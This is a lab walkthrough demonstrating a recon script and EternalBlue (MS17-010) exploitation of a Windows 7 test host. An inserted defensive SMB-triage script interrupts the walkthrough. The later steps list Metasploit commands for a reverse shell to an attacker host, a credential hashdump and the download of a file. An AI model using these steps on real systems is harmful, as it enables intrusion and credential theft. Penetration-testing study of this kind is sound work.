🔍 Reconamil.sh - Professional Recon & Exploit Demo

Step-by-step scanning, enumeration & exploitation on Windows 7 SP1 (MS17-010)

✅ Objective

Showcase how Reconamil.sh automates recon and helps identify vulnerabilities, leading to successful exploitation of MS17-010 (EternalBlue) on a Windows 7 SP1 system.

⚙️ Step 1: Scanning & Enumeration

Used the Reconamil.sh script to scan the target:

git clone https://github.com/ravisairockey/Recon-Racket
cd Recon-Racket
chmod +x Reconamil.sh
./Reconamil.sh -t 192.168.2.134 -r -p "1-65535"

Reconamil.sh performed:

Saved HTML and text reports to logs/.

📋 Scan Result Snapshot

Below is the actual captured output:

Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 04:46 EDT
Nmap scan report for 192.168.2.134
Host is up (0.00013s latency).
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Ultimate 7601 Service Pack 1
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0
49152/tcp open  msrpc        Microsoft Windows RPC
...
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   message_signing: disabled (dangerous)
| smb-os-discovery:
|   OS: Windows 7 Ultimate 7601 Service Pack 1
|   Computer name: WIN-845Q99004PP
|   Workgroup: WORKGROUP
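
The scan output above already contains the hardening gaps a defender would act on: SMB reachable on 445, message signing disabled, a guest session accepted, and an end-of-support Windows release. The following is an added example, not part of Reconamil.sh or the Recon-Racket repository, that triages Nmap normal-format output for those four conditions; the function names and finding labels are assumptions chosen for illustration.

```shell
#!/usr/bin/env bash
# Added example: triage Nmap normal-format output for SMB hardening gaps.
# smb_triage, sample_scan and the finding labels are hypothetical names,
# not part of Reconamil.sh.

smb_triage() {
  # Reads Nmap normal output on stdin; prints one "host<TAB>finding" per line.
  awk '
    # Track the host each following line belongs to (IP may be in parentheses).
    /^Nmap scan report for /          { host = $NF; gsub(/[()]/, "", host) }
    # SMB service reachable from the scanner.
    /^445\/tcp +open/                 { print host "\tsmb-exposed" }
    # smb-security-mode: the server accepted a guest session.
    /account_used: *guest/            { print host "\tguest-session-accepted" }
    # smb-security-mode: signing off allows relay and tampering of SMB traffic.
    /message_signing: *disabled/      { print host "\tsmb-signing-disabled" }
    # smb-os-discovery: Windows releases that no longer receive updates.
    /^\| +OS: +Windows (7|Vista|XP|Server 2003|Server 2008)/ {
      print host "\tlegacy-windows"
    }
  '
}

# Constructed sample, trimmed from the scan output shown above.
sample_scan() {
  cat <<'EOF'
Nmap scan report for 192.168.2.134
Host is up (0.00013s latency).
PORT      STATE SERVICE      VERSION
445/tcp   open  microsoft-ds Windows 7 Ultimate 7601 Service Pack 1
Host script results:
| smb-security-mode:
|   account_used: guest
|   message_signing: disabled (dangerous)
| smb-os-discovery:
|   OS: Windows 7 Ultimate 7601 Service Pack 1
EOF
}

sample_scan | smb_triage
```

Each finding maps to a fix: install the MS17-010 update and disable SMBv1, require SMB signing, disable guest access, and restrict 445/tcp to hosts that need it.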

🚀 Step 2: Vulnerability Confirmation

Ran NSE script to confirm MS17-010:

nmap -p445 --script smb-vuln-ms17-010 192.168.2.134

Result: Target is vulnerable!

💥 Step 3: Exploitation (Metasploit)

Used EternalBlue exploit module:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.2.134
set LHOST 192.168.2.131
set LPORT 4444
exploit

Gained Meterpreter shell with SYSTEM privileges:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

🔑 Step 4: Post-Exploitation

meterpreter > ps
meterpreter > hashdump
meterpreter > screenshot
meterpreter > download C:\Users\Administrator\Desktop\secrets.docx

📦 Tools Used

✅ Conclusion

Demonstrated a real-world use case: how Reconamil.sh speeds up recon & scanning to find critical vulnerabilities, leading to successful exploitation and post-exploitation on Windows 7.